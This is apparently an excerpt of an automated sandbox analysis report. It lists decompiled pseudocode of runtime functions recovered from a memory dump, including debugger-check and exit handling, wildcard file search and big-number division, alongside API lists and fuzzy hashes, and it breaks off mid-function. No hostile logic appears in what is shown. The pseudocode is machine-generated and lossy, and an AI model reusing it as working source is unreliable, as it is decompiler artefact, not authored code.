                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorH_prolog3Last
                    • String ID: operation failed with error $OS_Rng:
                    • API String ID: 685212868-700108173
                    • Opcode ID: 4d23377c1e26ec8fe09d7627f60c3a072b43694caf525927b2b3006963483491
                    • Instruction ID: 597aae3b56e524ebb0a2cd676a1363043d8abb868c07e10a19ad59aab30763e6
                    • Opcode Fuzzy Hash: 4d23377c1e26ec8fe09d7627f60c3a072b43694caf525927b2b3006963483491
                    • Instruction Fuzzy Hash: 24518DB1D00259DBEF15DFA8CC48BEEBBB8FB15318F20415DE411AB281DB755A49CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E013FD897(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v0;
                    				signed int _v8;
                    				intOrPtr _v524;
                    				intOrPtr _v528;
                    				void* _v532;
                    				intOrPtr _v536;
                    				char _v540;
                    				intOrPtr _v544;
                    				intOrPtr _v548;
                    				intOrPtr _v552;
                    				intOrPtr _v556;
                    				intOrPtr _v560;
                    				intOrPtr _v564;
                    				intOrPtr _v568;
                    				intOrPtr _v572;
                    				intOrPtr _v576;
                    				intOrPtr _v580;
                    				intOrPtr _v584;
                    				char _v724;
                    				intOrPtr _v792;
                    				intOrPtr _v800;
                    				char _v804;
                    				struct _EXCEPTION_POINTERS _v812;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t40;
                    				char* _t47;
                    				char* _t49;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				int _t67;
                    				intOrPtr _t68;
                    				signed int _t69;
                    
                    				_t68 = __esi;
                    				_t65 = __edx;
                    				_t60 = __ebx;
                    				_t40 =  *0x1435234; // 0x78d9f939
                    				_t41 = _t40 ^ _t69;
                    				_v8 = _t40 ^ _t69;
                    				if(_a4 != 0xffffffff) {
                    					_push(_a4);
                    					E013F3657(_t41);
                    					_pop(_t61);
                    				}
                    				E013F5890(_t66,  &_v804, 0, 0x50);
                    				E013F5890(_t66,  &_v724, 0, 0x2cc);
                    				_v812.ExceptionRecord =  &_v804;
                    				_t47 =  &_v724;
                    				_v812.ContextRecord = _t47;
                    				_v548 = _t47;
                    				_v552 = _t61;
                    				_v556 = _t65;
                    				_v560 = _t60;
                    				_v564 = _t68;
                    				_v568 = _t66;
                    				_v524 = ss;
                    				_v536 = cs;
                    				_v572 = ds;
                    				_v576 = es;
                    				_v580 = fs;
                    				_v584 = gs;
                    				asm("pushfd");
                    				_pop( *_t22);
                    				_v540 = _v0;
                    				_t49 =  &_v0;
                    				_v528 = _t49;
                    				_v724 = 0x10001;
                    				_v544 =  *((intOrPtr*)(_t49 - 4));
                    				_v804 = _a8;
                    				_v800 = _a12;
                    				_v792 = _v0;
                    				_t67 = IsDebuggerPresent();
                    				SetUnhandledExceptionFilter(0);
                    				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                    					_push(_a4);
                    					_t57 = E013F3657(_t57);
                    				}
                    				return E013F268B(_t57, _v8 ^ _t69);
                    			}






































                    0x013fd897
                    0x013fd897
                    0x013fd897
                    0x013fd8a2
                    0x013fd8a7
                    0x013fd8a9
                    0x013fd8b1
                    0x013fd8b3
                    0x013fd8b6
                    0x013fd8bb
                    0x013fd8bb
                    0x013fd8c7
                    0x013fd8da
                    0x013fd8e8
                    0x013fd8ee
                    0x013fd8f4
                    0x013fd8fa
                    0x013fd900
                    0x013fd906
                    0x013fd90c
                    0x013fd912
                    0x013fd918
                    0x013fd91e
                    0x013fd925
                    0x013fd92c
                    0x013fd933
                    0x013fd93a
                    0x013fd941
                    0x013fd948
                    0x013fd949
                    0x013fd952
                    0x013fd958
                    0x013fd95b
                    0x013fd961
                    0x013fd96e
                    0x013fd977
                    0x013fd980
                    0x013fd989
                    0x013fd997
                    0x013fd999
                    0x013fd9ae
                    0x013fd9ba
                    0x013fd9bd
                    0x013fd9c2
                    0x013fd9d1

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 013FD98F
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013FD999
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 013FD9A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 7f091010b74c3cbd4527a06b9fe54ab42289570ea17a094a68aaf687d0eb76a9
                    • Instruction ID: 132dc47c7e20b32d7bab78833531d6c7a7e0959f4f84994b74ecd939adcba83d
                    • Opcode Fuzzy Hash: 7f091010b74c3cbd4527a06b9fe54ab42289570ea17a094a68aaf687d0eb76a9
                    • Instruction Fuzzy Hash: 4131D47590122DABCB21DF68D988BDDBBB8BF18314F5041EAE91CA7250E7709B858F44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E014034C6(int _a4) {
                    				void* _t14;
                    
                    				if(E0140733A(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                    					TerminateProcess(GetCurrentProcess(), _a4);
                    				}
                    				E01403507(_t14, _a4);
                    				ExitProcess(_a4);
                    			}




                    0x014034d2
                    0x014034ee
                    0x014034ee
                    0x014034f7
                    0x01403500

                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0140349C,?), ref: 014034E7
                    • TerminateProcess.KERNEL32(00000000,?,0140349C,?), ref: 014034EE
                    • ExitProcess.KERNEL32 ref: 01403500
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: ab8af0de4366184ba7a4ba2bed28e16c92d1f28d855caa63ace303502ccbb82f
                    • Instruction ID: 4be152de93e9da65aa14df032f9ea717379ee3a554f41b8a39d3037eadd9ae66
                    • Opcode Fuzzy Hash: ab8af0de4366184ba7a4ba2bed28e16c92d1f28d855caa63ace303502ccbb82f
                    • Instruction Fuzzy Hash: 62E0EC35001288AFCF236F5ADA09A5A7F69FF64285F154039FD458B272CF36E942DB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0140C916(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				intOrPtr* _v32;
                    				CHAR* _v36;
                    				signed int _v48;
                    				char _v286;
                    				signed int _v287;
                    				struct _WIN32_FIND_DATAA _v332;
                    				intOrPtr* _v336;
                    				signed int _v340;
                    				signed int _v344;
                    				intOrPtr _v372;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t35;
                    				signed int _t40;
                    				signed int _t43;
                    				intOrPtr _t45;
                    				signed char _t47;
                    				intOrPtr* _t55;
                    				union _FINDEX_INFO_LEVELS _t57;
                    				union _FINDEX_INFO_LEVELS _t58;
                    				signed int _t62;
                    				signed int _t65;
                    				void* _t71;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t77;
                    				CHAR* _t78;
                    				intOrPtr* _t82;
                    				intOrPtr _t84;
                    				void* _t86;
                    				intOrPtr* _t87;
                    				signed int _t91;
                    				signed int _t95;
                    				void* _t100;
                    				intOrPtr _t101;
                    				signed int _t104;
                    				union _FINDEX_INFO_LEVELS _t105;
                    				void* _t109;
                    				void* _t110;
                    				intOrPtr _t111;
                    				void* _t112;
                    				signed int _t117;
                    				void* _t118;
                    				signed int _t119;
                    				void* _t120;
                    				void* _t121;
                    
                    				_push(__ecx);
                    				_t82 = _a4;
                    				_t2 = _t82 + 1; // 0x1
                    				_t100 = _t2;
                    				do {
                    					_t35 =  *_t82;
                    					_t82 = _t82 + 1;
                    				} while (_t35 != 0);
                    				_t104 = _a12;
                    				_t84 = _t82 - _t100 + 1;
                    				_v8 = _t84;
                    				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
                    					_t5 = _t104 + 1; // 0x1
                    					_t77 = _t5 + _t84;
                    					_t110 = E014009B2(_t84, _t77, 1);
                    					_t86 = _t109;
                    					__eflags = _t104;
                    					if(_t104 == 0) {
                    						L6:
                    						_push(_v8);
                    						_t77 = _t77 - _t104;
                    						_t40 = E01411431(_t86, _t110 + _t104, _t77, _a4);
                    						_t119 = _t118 + 0x10;
                    						__eflags = _t40;
                    						if(__eflags != 0) {
                    							goto L9;
                    						} else {
                    							_t71 = E0140CB55(_a16, __eflags, _t110);
                    							E014012E1(0);
                    							_t73 = _t71;
                    							goto L8;
                    						}
                    					} else {
                    						_push(_t104);
                    						_t74 = E01411431(_t86, _t110, _t77, _a8);
                    						_t119 = _t118 + 0x10;
                    						__eflags = _t74;
                    						if(_t74 != 0) {
                    							L9:
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							E013FDA8E();
                    							asm("int3");
                    							_t117 = _t119;
                    							_t120 = _t119 - 0x150;
                    							_t43 =  *0x1435234; // 0x78d9f939
                    							_v48 = _t43 ^ _t117;
                    							_t87 = _v32;
                    							_push(_t77);
                    							_t78 = _v36;
                    							_push(_t110);
                    							_t111 = _v332.cAlternateFileName;
                    							_push(_t104);
                    							_v372 = _t111;
                    							while(1) {
                    								__eflags = _t87 - _t78;
                    								if(_t87 == _t78) {
                    									break;
                    								}
                    								_t45 =  *_t87;
                    								__eflags = _t45 - 0x2f;
                    								if(_t45 != 0x2f) {
                    									__eflags = _t45 - 0x5c;
                    									if(_t45 != 0x5c) {
                    										__eflags = _t45 - 0x3a;
                    										if(_t45 != 0x3a) {
                    											_t87 = E01414060(_t78, _t87);
                    											continue;
                    										}
                    									}
                    								}
                    								break;
                    							}
                    							_t101 =  *_t87;
                    							__eflags = _t101 - 0x3a;
                    							if(_t101 != 0x3a) {
                    								L19:
                    								_t105 = 0;
                    								__eflags = _t101 - 0x2f;
                    								if(_t101 == 0x2f) {
                    									L23:
                    									_t47 = 1;
                    									__eflags = 1;
                    								} else {
                    									__eflags = _t101 - 0x5c;
                    									if(_t101 == 0x5c) {
                    										goto L23;
                    									} else {
                    										__eflags = _t101 - 0x3a;
                    										if(_t101 == 0x3a) {
                    											goto L23;
                    										} else {
                    											_t47 = 0;
                    										}
                    									}
                    								}
                    								_t89 = _t87 - _t78 + 1;
                    								asm("sbb eax, eax");
                    								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
                    								E013F5890(_t105,  &_v332, _t105, 0x140);
                    								_t121 = _t120 + 0xc;
                    								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
                    								_t55 = _v336;
                    								__eflags = _t112 - 0xffffffff;
                    								if(_t112 != 0xffffffff) {
                    									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                    									__eflags = _t91;
                    									_t92 = _t91 >> 2;
                    									_v344 = _t91 >> 2;
                    									do {
                    										__eflags = _v332.cFileName - 0x2e;
                    										if(_v332.cFileName != 0x2e) {
                    											L36:
                    											_push(_t55);
                    											_t57 = E0140C916(_t92,  &(_v332.cFileName), _t78, _v340);
                    											_t121 = _t121 + 0x10;
                    											__eflags = _t57;
                    											if(_t57 != 0) {
                    												goto L26;
                    											} else {
                    												goto L37;
                    											}
                    										} else {
                    											_t92 = _v287;
                    											__eflags = _t92;
                    											if(_t92 == 0) {
                    												goto L37;
                    											} else {
                    												__eflags = _t92 - 0x2e;
                    												if(_t92 != 0x2e) {
                    													goto L36;
                    												} else {
                    													__eflags = _v286;
                    													if(_v286 == 0) {
                    														goto L37;
                    													} else {
                    														goto L36;
                    													}
                    												}
                    											}
                    										}
                    										goto L40;
                    										L37:
                    										_t62 = FindNextFileA(_t112,  &_v332);
                    										__eflags = _t62;
                    										_t55 = _v336;
                    									} while (_t62 != 0);
                    									_t102 =  *_t55;
                    									_t95 = _v344;
                    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                    									__eflags = _t95 - _t65;
                    									if(_t95 != _t65) {
                    										E01413C80(_t102 + _t95 * 4, _t65 - _t95, 4, E0140C76E);
                    									}
                    								} else {
                    									_push(_t55);
                    									_t57 = E0140C916(_t89, _t78, _t105, _t105);
                    									L26:
                    									_t105 = _t57;
                    								}
                    								__eflags = _t112 - 0xffffffff;
                    								if(_t112 != 0xffffffff) {
                    									FindClose(_t112);
                    								}
                    								_t58 = _t105;
                    							} else {
                    								__eflags = _t87 -  &(_t78[1]);
                    								if(_t87 ==  &(_t78[1])) {
                    									goto L19;
                    								} else {
                    									_push(_t111);
                    									_t58 = E0140C916(_t87, _t78, 0, 0);
                    								}
                    							}
                    							__eflags = _v12 ^ _t117;
                    							return E013F268B(_t58, _v12 ^ _t117);
                    						} else {
                    							goto L6;
                    						}
                    					}
                    				} else {
                    					_t73 = 0xc;
                    					L8:
                    					return _t73;
                    				}
                    				L40:
                    			}



















































                    0x0140c91b
                    0x0140c91c
                    0x0140c91f
                    0x0140c91f
                    0x0140c922
                    0x0140c922
                    0x0140c924
                    0x0140c925
                    0x0140c92f
                    0x0140c932
                    0x0140c935
                    0x0140c93a
                    0x0140c943
                    0x0140c946
                    0x0140c950
                    0x0140c953
                    0x0140c954
                    0x0140c956
                    0x0140c96a
                    0x0140c96a
                    0x0140c96d
                    0x0140c977
                    0x0140c97c
                    0x0140c97f
                    0x0140c981
                    0x00000000
                    0x0140c983
                    0x0140c987
                    0x0140c990
                    0x0140c996
                    0x00000000
                    0x0140c999
                    0x0140c958
                    0x0140c958
                    0x0140c95e
                    0x0140c963
                    0x0140c966
                    0x0140c968
                    0x0140c99f
                    0x0140c9a1
                    0x0140c9a2
                    0x0140c9a3
                    0x0140c9a4
                    0x0140c9a5
                    0x0140c9a6
                    0x0140c9ab
                    0x0140c9af
                    0x0140c9b1
                    0x0140c9b7
                    0x0140c9be
                    0x0140c9c1
                    0x0140c9c4
                    0x0140c9c5
                    0x0140c9c8
                    0x0140c9c9
                    0x0140c9cc
                    0x0140c9cd
                    0x0140c9ee
                    0x0140c9ee
                    0x0140c9f0
                    0x00000000
                    0x00000000
                    0x0140c9d5
                    0x0140c9d7
                    0x0140c9d9
                    0x0140c9db
                    0x0140c9dd
                    0x0140c9df
                    0x0140c9e1
                    0x0140c9ec
                    0x00000000
                    0x0140c9ec
                    0x0140c9e1
                    0x0140c9dd
                    0x00000000
                    0x0140c9d9
                    0x0140c9f2
                    0x0140c9f4
                    0x0140c9f7
                    0x0140ca10
                    0x0140ca10
                    0x0140ca12
                    0x0140ca15
                    0x0140ca25
                    0x0140ca27
                    0x0140ca27
                    0x0140ca17
                    0x0140ca17
                    0x0140ca1a
                    0x00000000
                    0x0140ca1c
                    0x0140ca1c
                    0x0140ca1f
                    0x00000000
                    0x0140ca21
                    0x0140ca21
                    0x0140ca21
                    0x0140ca1f
                    0x0140ca1a
                    0x0140ca2d
                    0x0140ca35
                    0x0140ca39
                    0x0140ca47
                    0x0140ca4c
                    0x0140ca61
                    0x0140ca63
                    0x0140ca69
                    0x0140ca6c
                    0x0140ca9e
                    0x0140ca9e
                    0x0140caa0
                    0x0140caa3
                    0x0140caa9
                    0x0140caa9
                    0x0140cab0
                    0x0140caca
                    0x0140caca
                    0x0140cad9
                    0x0140cade
                    0x0140cae1
                    0x0140cae3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140cab2
                    0x0140cab2
                    0x0140cab8
                    0x0140caba
                    0x00000000
                    0x0140cabc
                    0x0140cabc
                    0x0140cabf
                    0x00000000
                    0x0140cac1
                    0x0140cac1
                    0x0140cac8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140cac8
                    0x0140cabf
                    0x0140caba
                    0x00000000
                    0x0140cae5
                    0x0140caed
                    0x0140caf3
                    0x0140caf5
                    0x0140caf5
                    0x0140cafd
                    0x0140cb02
                    0x0140cb0a
                    0x0140cb0d
                    0x0140cb0f
                    0x0140cb23
                    0x0140cb28
                    0x0140ca6e
                    0x0140ca6e
                    0x0140ca72
                    0x0140ca7a
                    0x0140ca7a
                    0x0140ca7a
                    0x0140ca7c
                    0x0140ca7f
                    0x0140ca82
                    0x0140ca82
                    0x0140ca88
                    0x0140c9f9
                    0x0140c9fc
                    0x0140c9fe
                    0x00000000
                    0x0140ca00
                    0x0140ca00
                    0x0140ca06
                    0x0140ca0b
                    0x0140c9fe
                    0x0140ca8f
                    0x0140ca9a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140c968
                    0x0140c93c
                    0x0140c93e
                    0x0140c99a
                    0x0140c99e
                    0x0140c99e
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: b7b08b8f7314b4f49605c3e3e16d56d7951e718eaa1b025902e034a1031d75b9
                    • Instruction ID: 1be8a120479a2aa83fea951c65dc48b1642938e7b9a9406bef90b768c80f1e07
                    • Opcode Fuzzy Hash: b7b08b8f7314b4f49605c3e3e16d56d7951e718eaa1b025902e034a1031d75b9
                    • Instruction Fuzzy Hash: C3310871900209AFDB258E7ECCC4EFB7B7DEB85314F1402E9E559D72A1E63099458B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,01404B35,?,00000004), ref: 01407021
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: e5557dcc7563f80de9dc186e89848d7eaf750e31675b2b36622bcd2887e3465c
                    • Instruction ID: 0c01209a0e3239756c49094cbb84630d74f77c0fa8e0dcb1adea8f6c5690858f
                    • Opcode Fuzzy Hash: e5557dcc7563f80de9dc186e89848d7eaf750e31675b2b36622bcd2887e3465c
                    • Instruction Fuzzy Hash: 13F0F631A41218BBCB22AF62CC05E7E7F20DF18711F10011EFD05562A0CA71991197D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01407077
                    Strings
                    • GetSystemTimePreciseAsFileTime, xrefs: 01407053
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID: GetSystemTimePreciseAsFileTime
                    • API String ID: 2086374402-595813830
                    • Opcode ID: e35e95e477c378008cc0673f4cee91a28eea3409cd56183e11d139fcba7cb5c7
                    • Instruction ID: 7004cb51e07bfee1660cdc4bc0c0fb2980520015c20fb011b8c9500fdf586f85
                    • Opcode Fuzzy Hash: e35e95e477c378008cc0673f4cee91a28eea3409cd56183e11d139fcba7cb5c7
                    • Instruction Fuzzy Hash: 2BE05570B82228BBD322AF268C05CBE7B60CF24A11B21026EFC064B2A0CA315D00C6C6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E01401420(signed int* _a4, signed int* _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int* _v80;
                    				char _v540;
                    				signed int _v544;
                    				signed int _t197;
                    				signed int _t198;
                    				signed int* _t200;
                    				signed int _t201;
                    				signed int _t204;
                    				signed int _t206;
                    				signed int _t208;
                    				signed int _t209;
                    				signed int _t213;
                    				signed int _t219;
                    				intOrPtr _t225;
                    				void* _t228;
                    				signed int _t230;
                    				signed int _t247;
                    				signed int _t250;
                    				void* _t253;
                    				signed int _t256;
                    				signed int* _t262;
                    				signed int _t263;
                    				signed int _t264;
                    				void* _t265;
                    				intOrPtr* _t266;
                    				signed int _t267;
                    				signed int _t269;
                    				signed int _t270;
                    				signed int _t271;
                    				signed int _t272;
                    				signed int* _t274;
                    				signed int* _t278;
                    				signed int _t279;
                    				signed int _t280;
                    				intOrPtr _t282;
                    				void* _t286;
                    				signed char _t292;
                    				signed int _t295;
                    				signed int _t303;
                    				signed int _t306;
                    				signed int _t307;
                    				signed int _t309;
                    				signed int _t311;
                    				signed int _t313;
                    				intOrPtr* _t314;
                    				signed int _t318;
                    				signed int _t322;
                    				signed int* _t328;
                    				signed int _t330;
                    				signed int _t331;
                    				signed int _t333;
                    				void* _t334;
                    				signed int _t336;
                    				signed int _t338;
                    				signed int _t341;
                    				signed int _t342;
                    				signed int* _t344;
                    				signed int _t349;
                    				signed int _t351;
                    				void* _t355;
                    				signed int _t359;
                    				signed int _t360;
                    				signed int _t362;
                    				signed int* _t368;
                    				signed int* _t369;
                    				signed int* _t370;
                    				signed int* _t373;
                    
                    				_t262 = _a4;
                    				_t197 =  *_t262;
                    				if(_t197 != 0) {
                    					_t328 = _a8;
                    					_t267 =  *_t328;
                    					__eflags = _t267;
                    					if(_t267 != 0) {
                    						_t3 = _t197 - 1; // -1
                    						_t349 = _t3;
                    						_t4 = _t267 - 1; // -1
                    						_t198 = _t4;
                    						_v16 = _t349;
                    						__eflags = _t198;
                    						if(_t198 != 0) {
                    							__eflags = _t198 - _t349;
                    							if(_t198 > _t349) {
                    								L23:
                    								__eflags = 0;
                    								return 0;
                    							} else {
                    								_t46 = _t198 + 1; // 0x0
                    								_t306 = _t349 - _t198;
                    								_v60 = _t46;
                    								_t269 = _t349;
                    								__eflags = _t349 - _t306;
                    								if(_t349 < _t306) {
                    									L21:
                    									_t306 = _t306 + 1;
                    									__eflags = _t306;
                    								} else {
                    									_t368 =  &(_t262[_t349 + 1]);
                    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                    									__eflags = _t341;
                    									while(1) {
                    										__eflags =  *_t341 -  *_t368;
                    										if( *_t341 !=  *_t368) {
                    											break;
                    										}
                    										_t269 = _t269 - 1;
                    										_t341 = _t341 - 4;
                    										_t368 = _t368 - 4;
                    										__eflags = _t269 - _t306;
                    										if(_t269 >= _t306) {
                    											continue;
                    										} else {
                    											goto L21;
                    										}
                    										goto L22;
                    									}
                    									_t369 = _a8;
                    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                    										goto L21;
                    									}
                    								}
                    								L22:
                    								__eflags = _t306;
                    								if(__eflags != 0) {
                    									_t330 = _v60;
                    									_t200 = _a8;
                    									_t351 =  *(_t200 + _t330 * 4);
                    									_t64 = _t330 * 4; // 0xfffedd04
                    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                    									_v36 = _t201;
                    									asm("bsr eax, esi");
                    									_v56 = _t351;
                    									if(__eflags == 0) {
                    										_t270 = 0x20;
                    									} else {
                    										_t270 = 0x1f - _t201;
                    									}
                    									_v40 = _t270;
                    									_v64 = 0x20 - _t270;
                    									__eflags = _t270;
                    									if(_t270 != 0) {
                    										_t292 = _v40;
                    										_v36 = _v36 << _t292;
                    										_v56 = _t351 << _t292 | _v36 >> _v64;
                    										__eflags = _t330 - 2;
                    										if(_t330 > 2) {
                    											_t79 = _t330 * 4; // 0xe850ffff
                    											_t81 =  &_v36;
                    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                    											__eflags =  *_t81;
                    										}
                    									}
                    									_v76 = 0;
                    									_t307 = _t306 + 0xffffffff;
                    									__eflags = _t307;
                    									_v32 = _t307;
                    									if(_t307 < 0) {
                    										_t331 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t85 =  &(_t262[1]); // 0x4
                    										_v20 =  &(_t85[_t307]);
                    										_t206 = _t307 + _t330;
                    										_t90 = _t262 - 4; // -4
                    										_v12 = _t206;
                    										_t278 = _t90 + _t206 * 4;
                    										_v80 = _t278;
                    										do {
                    											__eflags = _t206 - _v16;
                    											if(_t206 > _v16) {
                    												_t207 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t207 = _t278[2];
                    											}
                    											__eflags = _v40;
                    											_t311 = _t278[1];
                    											_t279 =  *_t278;
                    											_v52 = _t207;
                    											_v44 = 0;
                    											_v8 = _t207;
                    											_v24 = _t279;
                    											if(_v40 > 0) {
                    												_t318 = _v8;
                    												_t336 = _t279 >> _v64;
                    												_t230 = E013F30E0(_t311, _v40, _t318);
                    												_t279 = _v40;
                    												_t207 = _t318;
                    												_t311 = _t336 | _t230;
                    												_t359 = _v24 << _t279;
                    												__eflags = _v12 - 3;
                    												_v8 = _t318;
                    												_v24 = _t359;
                    												if(_v12 >= 3) {
                    													_t279 = _v64;
                    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                    													__eflags = _t360;
                    													_t207 = _v8;
                    													_v24 = _t360;
                    												}
                    											}
                    											_t208 = E013F3170(_t311, _t207, _v56, 0);
                    											_v44 = _t262;
                    											_t263 = _t208;
                    											_v44 = 0;
                    											_t209 = _t311;
                    											_v8 = _t263;
                    											_v28 = _t209;
                    											_t333 = _t279;
                    											_v72 = _t263;
                    											_v68 = _t209;
                    											__eflags = _t209;
                    											if(_t209 != 0) {
                    												L40:
                    												_t264 = _t263 + 1;
                    												asm("adc eax, 0xffffffff");
                    												_t333 = _t333 + E013F2820(_t264, _t209, _v56, 0);
                    												asm("adc esi, edx");
                    												_t263 = _t264 | 0xffffffff;
                    												_t209 = 0;
                    												__eflags = 0;
                    												_v44 = 0;
                    												_v8 = _t263;
                    												_v72 = _t263;
                    												_v28 = 0;
                    												_v68 = 0;
                    											} else {
                    												__eflags = _t263 - 0xffffffff;
